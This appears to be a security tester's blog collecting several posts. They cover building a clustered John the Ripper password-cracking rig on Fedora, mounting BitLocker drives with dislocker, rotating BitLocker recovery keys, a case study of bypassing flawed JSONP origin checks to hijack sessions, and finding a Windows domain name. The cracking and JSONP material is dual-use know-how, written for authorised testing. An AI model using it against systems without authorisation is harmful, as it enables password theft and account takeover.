
[Note this post is a little bit of a work in process as I continue to build and refine the cracking rig.] 

I’m using Fedora 23 Server on each of the hosts,  have configured a static IP address using the Cockpit interface on port 9090 (i.e https://ip_address:9090), and created a user which will be used to authenticate between the hosts.

[Update: I have successfully used the same process on Fedora 24]

On a side note, if when running dnf commands you encounter an error like:

Error: Failed to synchronize cache for repo 'updates' from 'https://mirrors.fedoraproject.org/metalink?repo=updates-released-f23&arch=x86_64': Cannot prepare internal mirrorlist: Curl error (60): Peer certificate cannot be authenticated with given CA certificates for https://mirrors.fedoraproject.org/metalink?repo=updates-released-f23&arch=x86_64 [Peer's Certificate has expired.]

You may not have access to the Internet because your network firewall / proxy is trying to mitm  – in my case I fixed this by shouting over to the firewall guy in the office.

As I need support for a large variety of hash formats the version of John in the Fedora repositories is useless to me, instead I am using the community enhanced edition.

Compiling John

Non-clustered

There are several dependencies that you need before attempting to build:

sudo dnf install openssl openssl-devel gcc

I first tried to install this from the tarball available on the openwall site. However when running:

cd src/
. /configure && make

I encountered some errors like this:

In file included from /usr/include/stdio.h:27:0,
 from jumbo.h:20,
 from os-autoconf.h:29,
 from os.h:20,
 from bench.c:25:
 /usr/include/features.h:148:3: warning: #warning "_BSD_SOURCE and _SVID_SOURCE are deprecated, use _DEFAULT_SOURCE" [-Wcpp]
 # warning "_BSD_SOURCE and _SVID_SOURCE are deprecated, use _DEFAULT_SOURCE"
 ^
 gpg2john.c: In function ‘pkt_type’:
 gpg2john.c:1194:7: warning: type of ‘tag’ defaults to ‘int’ [-Wimplicit-int]
 char *pkt_type(tag) {
 ^
 /usr/bin/ar: creating aes.a
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5_to_input_raw_Overwrite_NoLen':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4989: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4425: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5_in1_to_out2':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4732: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5_to_input_raw':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4903: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o: In function `DynamicFunc__crypt_md5_to_input_raw_Overwrite_NoLen_but_setlen_in_SSE':
 /opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4946: undefined reference to `MD5_body_for_thread'
 dynamic_fmt.o:/opt/john-1.8.0-jumbo-1/src/dynamic_fmt.c:4817: more undefined references to `MD5_body_for_thread' follow
 collect2: error: ld returned 1 exit status
 Makefile:294: recipe for target '../run/john' failed
 make[1]: *** [../run/john] Error 1
 Makefile:185: recipe for target 'default' failed
 make: *** [default] Error 2

I have no idea why this is and could not find out how to fix it, however I did discover that the version on GitHub is not affected by this problem.

sudo dnf install git
git clone https://github.com/magnumripper/JohnTheRipper.git
cd JohnTheRipper/src
./configure && make -s clean && make -s

You should now be able to use John :

cd ../run
./john --test

This gives a useable version of John for a single machine, but it will not work for a cluster.

Clustered (openmpi support)

For a cluster we need openmpi support.

First install the dependencies:

sudo dnf install openssl openssl-devel gcc openmpi openmpi-devel mpich

If you now try to build with openmpi support :

cd src/
./configure --enable-mpi && make -s clean && make -s

You will probably encounter an error like this:

checking build system type... x86_64-unknown-linux-gnu
 checking host system type... x86_64-unknown-linux-gnu
 checking whether to compile using MPI... yes
 checking for mpicc... no
 checking for mpixlc_r... no
 checking for mpixlc... no
 checking for hcc... no
 checking for mpxlc_r... no
 checking for mpxlc... no
 checking for sxmpicc... no
 checking for mpifcc... no
 checking for mpgcc... no
 checking for mpcc... no
 checking for cmpicc... no
 checking for cc... cc
 checking for gcc... (cached) cc
 checking whether the C compiler works... yes
 checking for C compiler default output file name... a.out
 checking for suffix of executables...
 checking whether we are cross compiling... no
 checking for suffix of object files... o
 checking whether we are using the GNU C compiler... yes
 checking whether cc accepts -g... yes
 checking for cc option to accept ISO C89... none needed
 checking whether cc understands -c and -o together... yes
 checking for function MPI_Init... no
 checking for function MPI_Init in -lmpi... no
 checking for function MPI_Init in -lmpich... no
 configure: error: in `/opt/john/JohnTheRipper/src':
 configure: error: No MPI compiler found
 See `config.log' for more details

The error here is that the mpi compiler and it’s libraries (which we installed previously) cannot be found because they are installed to a directory not in your path.

To fix this temporarily:

export PATH=$PATH:/usr/lib64/openmpi/bin
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib64/openmpi/lib

To fix more permanently add the following to your ~/.bashrc

PATH=$PATH:/usr/lib64/openmpi/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/lib64/openmpi/lib

You should now be able to build John with openmpi support:

. /configure --enable-mpi && make -s clean && make -s

Setting up the cluster

Now that we know how to get John installed successfully with openmpi support on Fedora Server 23, it’s time to setup the other services required to allow hashes to be cracked as part of a cluster.

In the example commands below, the master node is 192.168.0.1 and the slave node is 192.168.0.2.

EDIT: [I have recently noticed that ALL nodes need to be able to authenticate to and communicate with EVERY other node, once the number of nodes passes a certain number. Therefore every node must have an SSH key, with the public key in the authorized_keys file on every other node, and firewall rules allowing traffic between all nodes. I will find out how to automate this process and update this post in the future.]

Setup SSH Keys

On the master node generate an SSH key. The following command will prevent the passphrase prompt from appearing and set the key-pair to be stored in plaintext (this is not a very secure and I will be changing this to a more secure option on the near future, however since this key is only going to be used to access the slave nodes, and I am the only user on the box, it will do for now…):

ssh-keygen -b 2048 -t rsa -f ~/.ssh/id_rsa -q -N ""

Issue the following command on the master node to copy the ssh key to the authorized_keys file for the user of the slave node:

ssh-copy-id -i ~/.ssh/id_rsa.pub username@192.168.0.2

Note it is easiest if the user account on all of the nodes has the same name, however I believe it is possible to use different usernames (and keys) provided the ~/.ssh/config file has appropriate entries.

Ensure the permissions on the slave node are correct if you are having trouble using your key:

chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

And make sure that selinux is not getting in the way (again on the slave node):

restorecon -R -v ~/.ssh

Setup NFS

We will use an NFS share to store files that need to be shared between the nodes, for example the john.pot file and any wordlists we wish to use.

NFS and RPCBind are already installed in Fedora Server, they just need some configuration.

Make a directory to use as the nfs share on the master node and change the ownership to the user account we are using:

sudo mkdir /var/johnshare
sudo chown -R username /var/johnshare

Add this directory to the list of “exports”. Note that using ‘*’ in place of the host (in this case ‘192.168.0.2’) is a security vulnerability as it would allow ANY host to mount the share. It should be noted that any user on 192.168.0.2 will be able to mount this share, in this case this is not a serious issue since I have sole control over the node. (Information about securing NFS can be found here).

sudo vim /etc/exports
/var/johnshare  192.168.0.2(rw,sync)

Start exporting this directory and start the service:

sudo exportfs -a
sudo systemctl start nfs

At this point you should be able to see the export on localhost:

showmount -e 127.0.0.1
Export list for 127.0.0.1:
/var/johnshare 192.168.0.2

But if you try it from the slave node you will get the error:

clnt_create: RPC: Port mapper failure - Unable to receive: errno 113 (No route to host)

This is because the ports are not open on the firewall of the master node. The following commands will reconfigure the firewall to allow the services we need (on the master node):

firewall-cmd --permanent --add-service=nfs
firewall-cmd --permanent --add-service=mountd
firewall-cmd --permanent --add-service=rpc-bind
firewall-cmd --reload

Note the above commands will open several ports through your firewall from ANY host, while this is often not too much of a concern on an internal trusted network, ideally you should limit the rule to only the hosts required (see below).

Mount the NFS Share on the Nodes

Make a directory to mount the nfs share onto on the slave node and change the ownership to the user we are using:

sudo mkdir /var/johnshare
sudo chown -R username /var/johnshare

You could mount the nfs share manually using the following command:

sudo mount 192.168.0.1:/var/johnshare /var/johnshare

However this will not survive a reboot. Instead you could use /etc/fstab as described here, but apparently using autofs is more efficient.

Add the following configuration file to the slave node to use autofs:

cat /etc/auto.john
/var/johnshare -fstype=nfs 192.168.0.1:/var/johnshare

Edit file /etc/auto.master on the slave node and add the line:

/- /etc/auto.john

Start the automount service to mount the share and start it at boot:

sudo systemctl start autofs
sudo systemctl enable autofs

Mpiexec Firewall Rules

Ideally we would add specific ports for mpiexec to the firewall configuration, however a large number of ports are used for communication and are dynamically assigned. According to the documentation and mailing lists it should be possible to restrict the range of ports that will be used and then allow these through the firewall. Unfortunately during my setup I was unable to accomplish this. Unwilling to fall back to turning off the firewall permanently out of frustration I decided to go for the middle ground of allowing all ports but only to specific hosts. While this is not as granular as I would like, it is certainly more secure than no firewall at all.

sudo firewall-cmd --add-rich-rule 'rule family="ipv4" source address="192.168.0.2/32" accept'
sudo firewall-cmd --reload

Enter the same commands on the slave node, substituting the IP address.

[Update: it is possible to restrict the ports mpiexec uses by entering the following configuration into /etc/openmpi-x86_64/openmpi-mca-params.conf on all of the nodes:

oob_tcp_port_min_v4 = 10000
oob_tcp_port_range_v4 = 100
btl_tcp_port_min_v4 = 10000
btl_tcp_port_range_v4 = 100

This will make mpiexec use TCP ports 10000 to 10100, and you can therefore restrict the firewall configuration by both host and ports to minimise the attack surface. Note that as more nodes are added more ports may be required.]

You can test that your openmpi installation is working by issuing the following command on the master node:

mpiexec -n 1 -host 192.168.0.2 hostname

If all is well you should see the hostname of the slave node. If you see something like this:

ORTE was unable to reliably start one or more daemons.
This usually is caused by:
* not finding the required libraries and/or binaries on
 one or more nodes. Please check your PATH and LD_LIBRARY_PATH
 settings, or configure OMPI with --enable-orterun-prefix-by-default
* lack of authority to execute on one or more specified nodes.
 Please verify your allocation and authorities.
* the inability to write startup files into /tmp (--tmpdir/orte_tmpdir_base).
 Please check with your sys admin to determine the correct location to use.
* compilation of the orted with dynamic libraries when static are required
 (e.g., on Cray). Please check your configure cmd line and consider using
 one of the contrib/platform definitions for your system type.
* an inability to create a connection back to mpirun due to a
 lack of common network interfaces and/or no route found between
 them. Please check network connectivity (including firewalls
 and network routing requirements).

Then as the error indicates you have a problem that could have multiple causes, however the one that I encountered was the local firewall blocking the unsolicited connection from the remote node. Ensure you have added appropriate allow rules and either issued the reload command or restarted the service.

Install John on the Slave Node

Assign a static IP address, add the ssh key (ensure it is possible to authenticate with the key). Follow the steps above to install the dependencies, clone john from the repo, and build it (note that slave nodes also require openmpi). Ensure that it is in the same path as the other nodes. Configure and start autofs.

Running John Across the Cluster

Create a list of nodes and available cores on that node, on the master node:

cat nodes.txt
192.168.0.1 slots=8
192.168.0.2 slots=8

To run John on the configured nodes from the master node:

mpiexec -display-map -tag-output -hostfile nodes.txt ./john /var/johnshare/hashes.pwdump --format=nt --pot=/var/johnshare/john.pot --session=/var/johnshare/my_session_name

The -display-map parameter will output a list of the nodes and the host they are on at the start of the job, -tag-output will prefix every line of output from the program with the job id and the node number. I find this information helpful, however if you prefer less verbose information they can be omitted.

Note, it is important that the session file is accessible by all nodes (i.e. it must be on the NFS share) otherwise it will not be possible to resume a crashed/cancelled session. If you do not store the session file on the share, you will see an error like the one below from each of the cores on each of your slave nodes, but the session will resume on the master node:

9@192.168.0.2: fopen: my_session_name.rec: No such file or directory
8@192.168.0.2: fopen: my_session_name.rec: No such file or directory

Another error that you may encounter is:

9@192.168.0.2: 8@192.168.0.2: [192.168.0.2:28647] *** Process received signal ***
[192.168.0.2:28647] Signal: Segmentation fault (11)
[192.168.0.2:28647] Signal code: Address not mapped (1)
[192.168.0.2:28647] Failing at address: 0x1825048b64c4
[192.168.0.2:28648] *** Process received signal ***
[192.168.0.2:28648] Signal: Segmentation fault (11)
[192.168.0.2:28648] Signal code: Address not mapped (1)
[192.168.0.2:28648] Failing at address: 0x1825048b64c4
[192.168.0.2:28647] [ 0] /lib64/libpthread.so.0(+0x109f0)[0x7f504ffb19f0]
[192.168.0.2:28647] [ 1] /lib64/libc.so.6(_IO_vfprintf+0xaef)[0x7f504fc2c38f]
[192.168.0.2:28647] [ 2] /lib64/libc.so.6(+0x4e441)[0x7f504fc2e441]
[192.168.0.2:28647] [ 3] /lib64/libc.so.6(_IO_vfprintf+0x1bd)[0x7f504fc2ba5d]
[192.168.0.2:28647] [ 4] /opt/john/JohnTheRipper/run/john[0x6354eb]
[192.168.0.2:28647] [ 5] /opt/john/JohnTheRipper/run/john[0x625b03]
[192.168.0.2:28647] [ 6] /opt/john/JohnTheRipper/run/john[0x6237cb]
[192.168.0.2:28647] [ 7] /opt/john/JohnTheRipper/run/john[0x624227]
[192.168.0.2:28647] [ 8] /opt/john/JohnTheRipper/run/john[0x62516c]
[192.168.0.2:28647] [ 9] /lib64/libc.so.6(__libc_start_main+0xf0)[0x7f504fc00580]
[192.168.0.2:28647] [10] /opt/john/JohnTheRipper/run/john[0x4065a9]
[192.168.0.2:28647] *** End of error message ***
[192.168.0.2:28648] [ 0] /lib64/libpthread.so.0(+0x109f0)[0x7f386381b9f0]
[192.168.0.2:28648] [ 1] /lib64/libc.so.6(_IO_vfprintf+0xaef)[0x7f386349638f]
[192.168.0.2:28648] [ 2] /lib64/libc.so.6(+0x4e441)[0x7f3863498441]
[192.168.0.2:28648] [ 3] /lib64/libc.so.6(_IO_vfprintf+0x1bd)[0x7f3863495a5d]
[192.168.0.2:28648] [ 4] /opt/john/JohnTheRipper/run/john[0x6354eb]
[192.168.0.2:28648] [ 5] /opt/john/JohnTheRipper/run/john[0x625b03]
[192.168.0.2:28648] [ 6] /opt/john/JohnTheRipper/run/john[0x6237cb]
[192.168.0.2:28648] [ 7] /opt/john/JohnTheRipper/run/john[0x624227]
[192.168.0.2:28648] [ 8] /opt/john/JohnTheRipper/run/john[0x62516c]
[192.168.0.2:28648] [ 9] /lib64/libc.so.6(__libc_start_main+0xf0)[0x7f386346a580]
[192.168.0.2:28648] [10] /opt/john/JohnTheRipper/run/john[0x4065a9]
[192.168.0.2:28648] *** End of error message ***
Session aborted
3 0g 0:00:00:02 0.00% (ETA: Wed 09 Jul 2031 01:57:37 BST) 0g/s 0p/s 0c/s 0C/s
4 0g 0:00:00:02 0.02% (ETA: 00:00:21) 0g/s 305045p/s 305045c/s 859007KC/s bear902..zephyr902
[192.168.0.1][[28350,1],3][btl_tcp_endpoint.c:818:mca_btl_tcp_endpoint_complete_connect] connect() to 192.168.0.2 failed: Connection refused (111)
5 0g 0:00:00:04 0.37% (ETA: 21:56:45) 0g/s 2599Kp/s 2599Kc/s 7557MC/s 47886406..M1911a16406
[192.168.0.1][[28350,1],4][btl_tcp_endpoint.c:818:mca_btl_tcp_endpoint_complete_connect] connect() to 192.168.0.2 failed: Connection refused (111)
6 0g 0:00:00:06 0.78% (ETA: 21:51:27) 0g/s 3527Kp/s 3527Kc/s 10677MC/s skyler.&01..virgil.&01
[192.168.0.1][[28350,1],5][btl_tcp_endpoint.c:818:mca_btl_tcp_endpoint_complete_connect] connect() to 192.168.0.2 failed: Connection refused (111)
7 0g 0:00:00:08 1.12% (ETA: 21:50:34) 0g/s 3873Kp/s 3873Kc/s 11466MC/s Angie18%$..Cruise18%$
[192.168.0.1][[28350,1],6][btl_tcp_endpoint.c:818:mca_btl_tcp_endpoint_complete_connect] connect() to 192.168.0.2 failed: Connection refused (111)
--------------------------------------------------------------------------
mpiexec noticed that process rank 7 with PID 0 on node 192.168.0.2 exited on signal 11 (Segmentation fault).
--------------------------------------------------------------------------

In my experience this extremely unhelpful error means that the slave node cannot access the NFS share. I first encountered this when a slave node rebooted and I learned that I had not enabled autofs to start on boot.

You can get each process to output it’s status by sending the USR1 signal using pkill (you should also run this command before cancelling a session to ensure that only the minimum work possible is lost):

pkill - USR1 mpiexec

You can force a pot sync to stop other nodes from working on hashes and salts that have already been cracked by sending the USR2 signal:

pkill - USR2 mpiexec

Adding New Nodes

Follow the same process above to add the ssh public key of the master node to the new slave node, install John with openmpi support, configure autofs to mount the nfs share, add the new node to the /etc/exports file on the master node, to the list of nodes on the master node, restrictions the ports in use if required, and add the firewall rules on the master and slave node to allow full access between them.

More Troubleshooting

After adding some nodes to my cluster and running some jobs I started to find that long running tasks (such as running john with a large wordlist and some complex rules) hung with the following error:

mca_btl_tcp_frag_recv: readv failed: Connection timed out

The Google results I found talking about this error were mostly discussing when this error was encountered at the start of a job and were often the result of host based firewalling errors. These did not seem to be relevant to my situation since the task completed, but hung on this error instead of exiting.

A quirk of my cluster  is that it is distributed around a network rather than being on its own network segment as recommended for MPI clusters. This means that the connections between the nodes are passing through a firewall, and although the ports that are required are allowed, the firewall turned out to be the cause of my problem.

The idle connection timeout on the firewall rule was configured to the default 180 seconds, increasing this to 86400 seconds (1 day) resolved the issue. 

My best guess for why this is the case is that the connection is established at the start of the job, but then remains idle until a hash is cracked, therefore on long running jobs the idle timeout is exceeded and the firewall terminates the connection. I would have expected the program to reestablish the connection when it needs to use it again, but this does not appear to be the case and instead timeouts trying to use its existing (terminated) connection.

Obviously a better solution would be to move the nodes onto the same network to remove the firewall from the equation, but unfortunately that isn’t an option right now.


As always, if you have any questions, comments or suggestions please feel free to get in touch.

Using BitLocker To Go on Fedora 23 (dislocker)

I have multiple machines, some run Windows and some run Fedora. I also need to keep a significant amount of my data encrypted l, and I need to be able to do this from Windows machines that are not under my control.

Both Windows and Linux have multiple encryption solutions available, with varying levels of uptake and acceptance. However in order to be as compatible as possible for my clients, I decided to use a Windows solution and figure out how to use it on Linux.

BitLocker  is the obvious choice for Windows compatability. Enabling BitLocker on a USB stick, will include the executables required to mount the volume on any Windows machine.

Dislocker can be used on Linux systems to mount the Bitlocker volume – although this tool was initially read only it now supports read/write. (Note I have only tried this using ExFAT formatted drives, however I believe FAT and NTFS will also work.)

The following is my cheat sheet of how to install and use dislocker.

Note: All commands as root

Installing dislocker

Install exfat support

dnf install exfat-utils fuse-exfat

At the moment need to enable the testing repo so that we can get the version of dislocker that supports usb (need at least v0.5) [Could also install from source…]

dnf config-manager --set-enabled updates-testing

Install dislocker

dnf install dislocker fuse-dislocker

Disable the testing repo so that we aren’t getting any other unstable packages when we install

dnf config-manager --set-disabled updates-testing

 

Make a mount point for dislocker container

mkdir /mnt/dislocker-container

Make a mount point for the dislocker file

mkdir /mnt/dislocker

 

Mounting a BitLocker USB device

Find the usb device probably /dev/sdc1 or similar

fdisk -l

Mount the dislocker container (assuming /dev/sdc1 is the USB) using the User password you configured when you setup BitLocker (you will be prompted). Note recovery passwords and filed are also supported.

dislocker -v -V /dev/sdc1 -u -- /mnt/dislocker-container

Make sure that this has worked correctly, ‘dislocker-file’  should be within that directory.

ls /mnt/dislocker-container/dislocker-file

Mount the dislocker-file as a loop device and give everyone permission to write to it (maybe should restrict this more…)

mount -o loop,umask=0,uid=nobody,gid=nobody /mnt/dislocker-container/dislocker-file /mnt/dislocker

Thats it!
Work on the files in /mnt/dislocker you should have read write access (for all users).

Common Errors:

Some error about the /mnt/dislocker-container already existing. You don’t have fuse-dislocker installed so it is trying to create an unencrypted copy of the usb.

Its taking ages and running out of disk space. Same as above, it’s trying to make an unencrypted copy of your volume.

Unmounting

Make sure you aren’t in the directories you need to unmount or it will error

cd /mnt

Unmount the dislocker-file mount point

umount /mnt/dislocker

Unmount the dislocker container mount point

umount /mnt/dislocker-container

Eject the USB device using the file manager on the system.

Done!


As always, if you have any comments or suggestions please feel free to get in touch.

Change the TPM Owner Password and BitLocker Recovery Key

I recently purchased a Microsoft Surface Pro 4 which came with Windows 10. BitLocker was enabled by default during setup, however the recovery key was automatically uploaded to my Microsoft account. While this is a really good feature and for the vast majority of users will not pose a problem, I have slightly different concerns than the average user… therefore I decided I did not want my recovery key to be entrusted to Microsoft.

The quickest and easiest option was to delete the recovery key from my Microsoft account, which can be done here. However although this would remove my ability to get my recovery key from my Microsoft account it gives me absolutely no guarantee that Microsoft actually deleted it in any kind of permanent way, and given that everyone has a rigorous backup process (right? 😉 ), it is actually very likely that they actually still have my recovery key.

To have slightly more confidence I decided to change both the TPM Owner Password and BitLocker Recovery Key on my machine and keep them in a safe place offline in case I ever needed them.

To change the TPM Owner Password, open tpm.msc, then select “Change Owner Password…” in the top right, I followed the prompts within the dialogue box to change the password and save the file to external media.

To change the BitLocker Recovery Key is slightly more involved and utilises  the BitLocker Device Encryption Configuration Tool:

manage-bde

Assuming C: is the BitLocker protected drive you want to change recovery password do the following within an elevated command prompt.

List the recovery passwords:

 manage-bde C: -protectors -get -type RecoveryPassword

Locate which protector you want to change, there is probably only one, and copy its ID field including the curly braces.

Delete this protector:

manage-bde C: -protectors -delete -id [ID you copied]

Create a new protector:

Type manage-bde C: -protectors -add -rp

Note you can specify a 48 digit password at the end of the previous command if you wish, however if one is not specified one is randomly generated for you  – computers are much better at randomly generating passwords than you so probably best to let it do it.

Take heed of the output of the last command:

ACTIONS REQUIRED:

1. Save this numerical recovery password in a secure location away from your computer:

[YOUR RECOVERY KEY IS HERE]

To prevent data loss, save this password immediately. This password helps ensure that you can unlock the encrypted volume.

As always, if you have any comments or suggestions please feel free to get in touch.

Exploiting JSONP

JavaScript Object Notation with Padding (JSONP) is a technique created by web developers to bypass the Same Origin Policy which enforced by browsers to prevent one web application from retrieving information from others. JSONP takes advantage of the fact that in the eyes of the browser not all resources are created equal -JavaScript, images and a few other types can be loaded cross domain.

In order to pass data cross domain JSONP “smuggles” it within JavaScript and utilities a callback. i.e. The receiving domain includes a script tag with the source attribute set to a specific URL of the sending domain. This script from the sending domain contains the data that needs to be sent cross domains and passes it to a function of the receiving domain. The function on the receiving domain will parse data and use it as required.

While this all sounds perfectly innocent, it easily becomes a security vulnerability when you remember that it is often sensitive data that is passed between domains, for example session tokens, and since it is abusing the behavior of the Same Origin Policy there is no built in or standardized security mechanism which may be used to ensure the receiving domain is the intended one.

Depending on the exact usage of JSONP, the vulnerability may result in sensitive information disclosure, Cross Site Scripting, Cross Site Request Forgery, only Reflected File Download. I have most often seen JSONP being used to implement a Single Sign On system, therefore if sufficient validation of the receiving domain is not performed exploitation results in session hijacking or account take over.

In the simplest instance, no validation is performed an exploitation is as simple as including the script from the sending domain within the attacker’s site and persuading a user of the sending application to visit the attacker’s site.

However there are more complex instances where the web developer has attempted to prevent the data being passed to malicious domains. This can take a variety of forms but is often incomplete whether on the client side or the server side.

Anonymous Case Study

On a recent web application test I encountered a single sign on system utilising JSONP and enforcing server side checks on the HTTP Referer header before returning the script containing the session token, and the script itself performed client side checks on the document.domain attribute before passing the token to the JavaScript function. However both of these pieces of validation were flawed and therefore it was possible to hijack the user’s session, and with further work I believe it would have resulted in full account takeover.

The server side validation consisted of a check of the requesting domain against a Regular Expression, however as is often the case the developers overlooked the fact that “.” in Regular Expressions is a wild card. Therefore although the developer only intended to allow “www.somedomain.co.uk” the wild card meant that “wwwXsomedomainXcoXuk” would pass validation (I also identified that any subdomain was allowed i.e “XXXX.wwwXsomedomainXcoXuk”) – however remember it also had to be a valid domain, so the final dot needed to be an actual dot – obviously there were many domains that could be registered to meet these requirements.

The client side validation was significantly more unusual, it consisted of a CRC32 hash of the document.domain and comparing it to a list of approved values. However due to the limited size of the hash (32 bits) it is a mathematical certainty that multiple domains exist that would result in the same hash and therefore pass validation.

In order to exploit this usage of JSONP
I needed to pass both the server and client side validation. To do this I decided to write a Python script to iterate through all the permutations that would pass the Regular Expression in order to identify one that would also pass the CRC32 validation. (Unfortunately this script cannot be released at this time, but I hope to share it in the future as it could be useful to others).

It took over 1.6 billion permutations, but I eventually identified a valid domain and was able register it and exploit the flawed JSONP validation to hijack a user’s session.

Defense

JSONP should no longer be used as HTML5 features like CORS and PostMessage are available with well defined security mechanisms, however these also require careful validation of the “origin” to prevent the data being passed to unauthorised domains.


As always, if you have any comments or suggestions please feel free to get in touch.

How to find the Windows DNS style Domain Name

A common requirement on internal network assessments is to know the fully qualified Windows domain name of the network. This is trivial to obtain if using DHCP.

On Linux like systems simply:

cat /etc/resolv.conf

The domain name is in the ‘domain’ or ‘search’ field.

On Windows you can see the domain name in the Network Settings accessible from the system tray on in the ‘DNS suffix’ section of the output of:

ipconfig

However if for whatever reason you are not using DHCP these methods are less likely to work. But it is possible to get the domain name by querying a host on the network. My preferred method of doing this is, of course, python:

import socket
socket.gethostbyaddr("ip_addr")

Where ip_addr is any live host on the network, the DNS server I act as pot of thestatic configuration is what I usually use. This function returns the full qualified domain name, a list of aliases (commonly the NetBIOS  name), and the IP address of the remote host. Everything after the first ‘.’ in the FQDN is the DNS style Windows Domain Name. E.g. if the FQDN of the host is:

dnsserv1.corp.ad.company.com

the domain name would be:

corp.ad.company.com

There are other methods that may be used to identify the legacy -but ubiquitous – NetBIOS style Windows Doman Name which I will save for a future post.

This information can then be used to identify the Windows Domain Controllers, which I will also describe in a later post.